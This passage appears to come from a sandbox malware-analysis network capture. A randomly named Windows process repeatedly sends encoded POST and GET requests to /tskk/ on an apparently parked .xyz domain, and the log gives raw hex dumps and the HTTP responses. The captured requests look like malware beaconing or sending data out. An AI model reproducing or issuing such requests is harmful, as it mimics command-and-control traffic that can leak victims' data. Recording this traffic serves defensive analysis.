                                                                                Dec 3, 2024 14:23:40.159296989 CET783INData Raw: 39 32 20 32 33 38 2e 38 35 39 20 34 30 34 2e 37 32 38 20 32 39 38 2e 32 35 36 20 33 37 38 2e 30 36 37 20 33 35 33 2e 37 38 36 43 33 35 31 2e 34 30 35 20 34 30 39 2e 33 31 37 20 32 39 39 2e 38 34 31 20 34 33 39 2e 39 35 33 20 32 36 32 2e 38 39 36
                                                                                Data Ascii: 92 238.859 404.728 298.256 378.067 353.786C351.405 409.317 299.841 439.953 262.896 422.214Z" fill="#013F93" /></g><defs><filter id="filter0_f_2001_5" x="0.329773" y="0.914673" width="629.662" height="810.506" filterUnits=
                                                                                Dec 3, 2024 14:23:40.197566032 CET1236INData Raw: 63 30 37 0d 0a 0a 09 09 09 09 09 09 09 09 3c 66 65 42 6c 65 6e 64 20 6d 6f 64 65 3d 22 6e 6f 72 6d 61 6c 22 20 69 6e 3d 22 53 6f 75 72 63 65 47 72 61 70 68 69 63 22 20 69 6e 32 3d 22 42 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 46 69 78 22 20 72
                                                                                Data Ascii: c07<feBlend mode="normal" in="SourceGraphic" in2="BackgroundImageFix" result="shape" /><feGaussianBlur stdDeviation="75" result="effect1_foregroundBlur_2001_5" /></filter><filter id="filter2_f_2001_5" x="59.
                                                                                Dec 3, 2024 14:23:40.278935909 CET1236INData Raw: 74 68 65 20 73 69 74 65 20 6f 6e 6c 79 20 77 6f 72 6b 73 20 77 69 74 68 20 49 50 76 34 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 3c 2f 6c 69 3e 0a 09 09 09 09 09 09 3c 2f 75 6c 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69
                                                                                Data Ascii: the site only works with IPv4 on the server.</li></ul></div><div class="window-main__actions"><a href="https://kb.fastpanel.direct/troubleshoot/" class="window-main__link _link">View more possible reasons</a></d


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.550012199.59.243.227801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:45.772495985 CET807OUTPOST /tskk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dating-apps-az-dn5.xyz
                                                                                Origin: http://www.dating-apps-az-dn5.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.dating-apps-az-dn5.xyz/tskk/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 6c 37 75 68 39 2b 4f 2b 50 77 41 6f 43 47 46 7a 56 72 49 46 57 69 47 74 2f 43 53 4c 51 43 53 44 51 66 72 76 66 31 4e 73 67 57 2f 68 4f 31 6d 61 41 71 58 79 50 2b 32 74 6e 55 4e 39 61 43 42 45 61 46 32 52 68 75 4e 42 5a 76 65 42 37 52 34 52 59 59 55 55 6f 78 30 47 6d 46 77 4e 68 48 63 4f 6a 58 32 53 4b 51 6a 42 6b 4f 51 7a 57 31 49 63 32 33 31 6a 4d 78 31 57 5a 34 36 6f 51 46 78 4b 63 6f 55 68 55 6c 77 38 63 41 36 6e 70 2f 52 31 44 64 51 4a 57 54 34 7a 78 4f 79 53 5a 64 72 31 56 48 4e 41 36 59 70 45 35 79 2f 77 62 67 55 36 68 46 51 55 69 66 47 55 7a 76 45 4c 52 59 44 57 6a 44 77 79 48 59 63 3d
                                                                                Data Ascii: fh=l7uh9+O+PwAoCGFzVrIFWiGt/CSLQCSDQfrvf1NsgW/hO1maAqXyP+2tnUN9aCBEaF2RhuNBZveB7R4RYYUUox0GmFwNhHcOjX2SKQjBkOQzW1Ic231jMx1WZ46oQFxKcoUhUlw8cA6np/R1DdQJWT4zxOySZdr1VHNA6YpE5y/wbgU6hFQUifGUzvELRYDWjDwyHYc=
                                                                                Dec 3, 2024 14:23:46.977547884 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:23:46 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1154
                                                                                x-request-id: 5e672680-c018-459d-b9d2-896fb8eff65d
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==
                                                                                set-cookie: parking_session=5e672680-c018-459d-b9d2-896fb8eff65d; expires=Tue, 03 Dec 2024 13:38:46 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 6b 35 43 61 5a 68 38 79 65 55 34 38 7a 4d 63 4b 37 77 53 51 73 6b 74 51 70 56 73 5a 4b 6b 47 5a 32 42 64 66 63 48 5a 48 76 6f 4c 31 6d 42 59 72 6a 64 48 72 4c 73 76 49 32 6c 45 37 6c 33 47 30 4f 77 38 5a 52 76 6c 46 39 49 2f 69 2f 50 6c 46 67 56 52 4a 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:23:46.977574110 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWU2NzI2ODAtYzAxOC00NTlkLWI5ZDItODk2ZmI4ZWZmNjVkIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.550013199.59.243.227801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:48.434071064 CET827OUTPOST /tskk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dating-apps-az-dn5.xyz
                                                                                Origin: http://www.dating-apps-az-dn5.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.dating-apps-az-dn5.xyz/tskk/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 6c 37 75 68 39 2b 4f 2b 50 77 41 6f 44 6b 52 7a 57 49 67 46 42 53 47 71 7a 69 53 4c 43 43 54 4b 51 66 33 76 66 77 39 38 68 6c 62 68 4f 55 57 61 42 6f 76 79 4d 2b 32 74 2f 45 4e 38 55 69 42 44 61 46 4b 33 68 73 5a 42 5a 75 36 42 37 54 77 52 66 72 73 58 6f 68 30 45 72 6c 77 31 76 6e 63 4f 6a 58 32 53 4b 51 6d 55 6b 4f 49 7a 56 46 59 63 35 7a 5a 67 46 52 31 5a 4a 6f 36 6f 55 46 77 44 63 6f 55 48 55 6b 73 53 63 43 79 6e 70 37 42 31 44 70 4d 4f 63 54 34 31 2f 75 79 43 49 4f 4b 43 56 78 5a 70 31 70 6b 41 73 43 50 39 58 32 6c 51 37 6e 59 38 78 2f 71 73 6a 38 4d 38 41 6f 69 2f 35 67 67 43 5a 50 4a 7a 58 52 50 6c 53 36 6d 67 57 57 78 74 35 2f 61 4b 57 74 76 48
                                                                                Data Ascii: fh=l7uh9+O+PwAoDkRzWIgFBSGqziSLCCTKQf3vfw98hlbhOUWaBovyM+2t/EN8UiBDaFK3hsZBZu6B7TwRfrsXoh0Erlw1vncOjX2SKQmUkOIzVFYc5zZgFR1ZJo6oUFwDcoUHUksScCynp7B1DpMOcT41/uyCIOKCVxZp1pkAsCP9X2lQ7nY8x/qsj8M8Aoi/5ggCZPJzXRPlS6mgWWxt5/aKWtvH
                                                                                Dec 3, 2024 14:23:49.565680027 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:23:48 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1154
                                                                                x-request-id: eac73d05-3aa8-4162-96ef-07d6ea191195
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==
                                                                                set-cookie: parking_session=eac73d05-3aa8-4162-96ef-07d6ea191195; expires=Tue, 03 Dec 2024 13:38:49 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 6b 35 43 61 5a 68 38 79 65 55 34 38 7a 4d 63 4b 37 77 53 51 73 6b 74 51 70 56 73 5a 4b 6b 47 5a 32 42 64 66 63 48 5a 48 76 6f 4c 31 6d 42 59 72 6a 64 48 72 4c 73 76 49 32 6c 45 37 6c 33 47 30 4f 77 38 5a 52 76 6c 46 39 49 2f 69 2f 50 6c 46 67 56 52 4a 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:23:49.565705061 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWFjNzNkMDUtM2FhOC00MTYyLTk2ZWYtMDdkNmVhMTkxMTk1IiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.550014199.59.243.227801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:51.272123098 CET1844OUTPOST /tskk/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.dating-apps-az-dn5.xyz
                                                                                Origin: http://www.dating-apps-az-dn5.xyz
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.dating-apps-az-dn5.xyz/tskk/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 6c 37 75 68 39 2b 4f 2b 50 77 41 6f 44 6b 52 7a 57 49 67 46 42 53 47 71 7a 69 53 4c 43 43 54 4b 51 66 33 76 66 77 39 38 68 6c 54 68 4f 69 43 61 4f 76 44 79 4e 2b 32 74 33 6b 4e 68 55 69 42 53 61 46 69 7a 68 73 56 52 5a 73 79 42 36 77 6f 52 65 61 73 58 6a 68 30 45 69 46 77 4f 68 48 64 61 6a 58 6d 4f 4b 54 4f 55 6b 4f 49 7a 56 44 63 63 77 48 31 67 48 52 31 57 5a 34 36 30 51 46 77 72 63 6f 39 79 55 6b 6f 73 64 79 53 6e 6f 61 74 31 42 36 6b 4f 51 54 34 33 79 4f 7a 64 49 4f 47 64 56 31 35 4c 31 70 51 36 73 41 76 39 55 58 4a 4c 72 43 34 36 67 4d 71 42 70 62 41 71 41 73 75 76 6e 7a 38 6e 52 76 31 42 55 53 7a 38 59 39 72 6c 56 32 74 39 6d 5a 57 68 54 71 2b 36 6c 65 4a 6a 43 74 6d 53 36 4d 74 41 45 34 32 53 4c 39 67 46 39 69 36 49 4a 6a 41 67 58 67 64 4b 55 45 66 7a 31 36 6f 4d 73 34 47 75 36 64 67 73 49 68 31 57 79 31 6d 4c 34 57 71 57 77 30 75 66 6d 37 49 46 55 67 43 37 51 6d 47 65 6f 47 44 2b 51 37 77 36 30 37 48 48 38 2f 48 51 64 51 4a 6f 37 79 52 7a 6b 4a 37 64 65 58 39 35 49 2f 78 54 61 70 59 [TRUNCATED]
                                                                                Data Ascii: fh=l7uh9+O+PwAoDkRzWIgFBSGqziSLCCTKQf3vfw98hlThOiCaOvDyN+2t3kNhUiBSaFizhsVRZsyB6woReasXjh0EiFwOhHdajXmOKTOUkOIzVDccwH1gHR1WZ460QFwrco9yUkosdySnoat1B6kOQT43yOzdIOGdV15L1pQ6sAv9UXJLrC46gMqBpbAqAsuvnz8nRv1BUSz8Y9rlV2t9mZWhTq+6leJjCtmS6MtAE42SL9gF9i6IJjAgXgdKUEfz16oMs4Gu6dgsIh1Wy1mL4WqWw0ufm7IFUgC7QmGeoGD+Q7w607HH8/HQdQJo7yRzkJ7deX95I/xTapYMa7sMGydYeeeGHzDRl5dTKECfoAVsHKuIssVqVeUV/tvjUot7eVIG567hCdZ4j1rK6Gs8laCM3Ik0PR08oQpE+21XryUz/7Wgzo2LObb+h79e35r5OG5bNGYwkI3dRt7IWQ7bLloQrv1lLPhZwYF0EtaWf68aCIZSFpCc+9BftE3jxTdKiOrKnCDqoRW2PXD2Og+z10sINOra0/sihKQFVGJeapGw0SgWaS/v1/ti3BScWWdukL+DmPOsBpVef1lkOdbgmhT+krHsxooXAaypycLIY4cJR9zNDlob0a9Y6ZkJrkcLWK9GleJwXQE7Lnakut6hMIiKXsIs3tQjDlz6FjIbauVfkCkskkxC20+MQwIMpwVKkmzl7snq117q7pF7xP2YMxd+a/Ws5RHmvi95l6bKolGxIvBtwHD+Rn3GdDWZq0VNHzUjrfk5zcnPS4t84faLOIl8HsfpxFTLMLcjO8P/8X+1U13zQ/uDSaCVLUjOmHSS3yO/hLNK0Ze8/ZCC0Y7vlgoylJAP3a6Kvu6NnJ8etM7IM5Io5avZtknEM+cPWWUBHpnB8dhoUwtvBjoNoU1MbwkB3i7l4JFKDPv3xXjCPTMBrXraAsyn/mHpKkA6gpW5/KUzByDXpph17d7BM7Kcm6LJr2RdSJ40j5NBce74t2EdQYsNA [TRUNCATED]
                                                                                Dec 3, 2024 14:23:52.235152006 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:23:51 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1154
                                                                                x-request-id: c6d18bba-3c6a-414b-aef1-c67fed49a12a
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==
                                                                                set-cookie: parking_session=c6d18bba-3c6a-414b-aef1-c67fed49a12a; expires=Tue, 03 Dec 2024 13:38:52 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 6b 35 43 61 5a 68 38 79 65 55 34 38 7a 4d 63 4b 37 77 53 51 73 6b 74 51 70 56 73 5a 4b 6b 47 5a 32 42 64 66 63 48 5a 48 76 6f 4c 31 6d 42 59 72 6a 64 48 72 4c 73 76 49 32 6c 45 37 6c 33 47 30 4f 77 38 5a 52 76 6c 46 39 49 2f 69 2f 50 6c 46 67 56 52 4a 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Hk5CaZh8yeU48zMcK7wSQsktQpVsZKkGZ2BdfcHZHvoL1mBYrjdHrLsvI2lE7l3G0Ow8ZRvlF9I/i/PlFgVRJg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:23:52.235292912 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzZkMThiYmEtM2M2YS00MTRiLWFlZjEtYzY3ZmVkNDlhMTJhIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.550015199.59.243.227801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:23:54.002166033 CET534OUTGET /tskk/?fh=o5GB+IawIAU5T0thXdQTAhCz8F67YQPQT/nwZCkciWz+LkCAD5WzKPOp+WFYKDZnS0ikteADWtOd2j97JYt8nhoktnI+jDBp8l2kGV3Ckdt2Sxo97xdpdVJjZoS3MkxEfg==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.dating-apps-az-dn5.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:23:55.178323984 CET1236INHTTP/1.1 200 OK
                                                                                date: Tue, 03 Dec 2024 13:23:54 GMT
                                                                                content-type: text/html; charset=utf-8
                                                                                content-length: 1522
                                                                                x-request-id: 2cd67dc8-0ae0-4bc6-bf81-69085079ef5b
                                                                                cache-control: no-store, max-age=0
                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                vary: sec-ch-prefers-color-scheme
                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u42grjlDShJAke290VbY+AfW+icf8oNle2PmlZ7onfwMW8K2rVbzx7kITYN9/9f0BX82dPKrotKLI1+NRqLDMQ==
                                                                                set-cookie: parking_session=2cd67dc8-0ae0-4bc6-bf81-69085079ef5b; expires=Tue, 03 Dec 2024 13:38:55 GMT; path=/
                                                                                connection: close
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 34 32 67 72 6a 6c 44 53 68 4a 41 6b 65 32 39 30 56 62 59 2b 41 66 57 2b 69 63 66 38 6f 4e 6c 65 32 50 6d 6c 5a 37 6f 6e 66 77 4d 57 38 4b 32 72 56 62 7a 78 37 6b 49 54 59 4e 39 2f 39 66 30 42 58 38 32 64 50 4b 72 6f 74 4b 4c 49 31 2b 4e 52 71 4c 44 4d 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_u42grjlDShJAke290VbY+AfW+icf8oNle2PmlZ7onfwMW8K2rVbzx7kITYN9/9f0BX82dPKrotKLI1+NRqLDMQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                Dec 3, 2024 14:23:55.178422928 CET975INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmNkNjdkYzgtMGFlMC00YmM2LWJmODEtNjkwODUwNzllZjViIiwicGFnZV90aW1lIjoxNzMzMjMyMj


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
